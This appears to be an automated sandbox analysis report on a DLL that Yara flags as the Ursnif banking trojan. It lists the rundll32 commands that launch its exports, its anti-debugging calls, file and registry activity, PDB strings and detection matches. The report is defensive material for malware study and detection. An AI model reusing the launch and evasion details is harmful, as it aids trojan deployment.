Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1EA1BF	5_2_6E1EA1BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1C99A0	5_2_6E1C99A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1CA260	6_2_6E1CA260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1CD1F0	6_2_6E1CD1F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1E8559	6_2_6E1E8559
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1DEDC4	6_2_6E1DEDC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1DC5EB	6_2_6E1DC5EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1CDA30	6_2_6E1CDA30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1E7AD1	6_2_6E1E7AD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1E8015	6_2_6E1E8015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1D68E0	6_2_6E1D68E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1EA1BF	6_2_6E1EA1BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1C99A0	6_2_6E1C99A0

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E1D9D10 appears 49 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1D9D10 appears 98 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E1DBFE0 appears 48 times

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852

Source: c36.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal72.troj.winDLL@17/18@3/3

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_02EAA65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

2_2_02EAA65C

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1632

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD1208600E5902E85.TMP

Jump to behavior

Source: c36.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\c36.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Division
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Division	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: c36.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: c36.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: c36.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: c36.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: c36.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: c36.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: c36.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdby1Zs# source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: c:\Door\26\Enter\Mos\Hard \Stretch.pdb source: loaddll32.exe, 00000002.00000002.484014411.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.487526023.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.386861374.000000006E1EB000.00000002.00020000.sdmp, c36.dll
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbT? source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdbG1xs( source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdbK1dsg& source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbgB source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp

Source: c36.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: c36.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: c36.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: c36.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: c36.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6E1A1BAC LoadLibraryA,GetProcAddress,

2_2_6E1A1BAC

Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1A2120 push ecx; ret	2_2_6E1A2129
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1A2173 push ecx; ret	2_2_6E1A2183
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_02EAABC0 push ecx; ret	2_2_02EAABC9
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_02EAAF6F push ecx; ret	2_2_02EAAF7F
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1B1F3E push ds; ret	2_2_6E1B1F42
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1B27B2 push edi; retf	2_2_6E1B27B4
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1B1511 push es; ret	2_2_6E1B156F
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1D9D55 push ecx; ret	2_2_6E1D9D68
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1D7255 push ecx; ret	2_2_6E1D7268
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E205803 push dword ptr [edi]; ret	2_2_6E205810
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E2060AF push 5DC4E471h; iretd	2_2_6E2060B9
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E2058DE push ebx; retf	2_2_6E2058E9
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E203501 push eax; ret	2_2_6E203531
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E203580 push eax; ret	2_2_6E203531
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E20678B push dword ptr [ebx+ecx+36B6D5EAh]; iretd	2_2_6E2067A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0118AF6F push ecx; ret	5_2_0118AF7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0118ABC0 push ecx; ret	5_2_0118ABC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1B670E pushad ; retf	5_2_6E1B6715
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1B1F3E push ds; ret	5_2_6E1B1F42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1B5779 push esp; iretd	5_2_6E1B577D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1B27B2 push edi; retf	5_2_6E1B27B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1B1511 push es; ret	5_2_6E1B156F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1D9D55 push ecx; ret	5_2_6E1D9D68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1D7255 push ecx; ret	5_2_6E1D7268
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1B59A9 push esp; ret	5_2_6E1B59B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E205803 push dword ptr [edi]; ret	5_2_6E205810
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E2060AF push 5DC4E471h; iretd	5_2_6E2060B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E2058DE push ebx; retf	5_2_6E2058E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E203501 push eax; ret	5_2_6E203531
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E203580 push eax; ret	5_2_6E203531
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E20678B push dword ptr [ebx+ecx+36B6D5EAh]; iretd	5_2_6E2067A1

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Last function: Thread delayed

Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000001A.00000003.425099600.000000000523C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000001A.00000002.428303510.000000000530D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@
Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_6E1D4FB4

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6E1A1BAC LoadLibraryA,GetProcAddress,

2_2_6E1A1BAC

Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E20434D mov eax, dword ptr fs:[00000030h]	2_2_6E20434D
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E20427C mov eax, dword ptr fs:[00000030h]	2_2_6E20427C
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E203E83 push dword ptr fs:[00000030h]	2_2_6E203E83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E20434D mov eax, dword ptr fs:[00000030h]	5_2_6E20434D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E20427C mov eax, dword ptr fs:[00000030h]	5_2_6E20427C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E203E83 push dword ptr fs:[00000030h]	5_2_6E203E83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E20434D mov eax, dword ptr fs:[00000030h]	6_2_6E20434D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E20427C mov eax, dword ptr fs:[00000030h]	6_2_6E20427C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E203E83 push dword ptr fs:[00000030h]	6_2_6E203E83

Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1D6ED0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E1D6ED0
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6E1D4FB4
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6E1D27C8 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E1D27C8
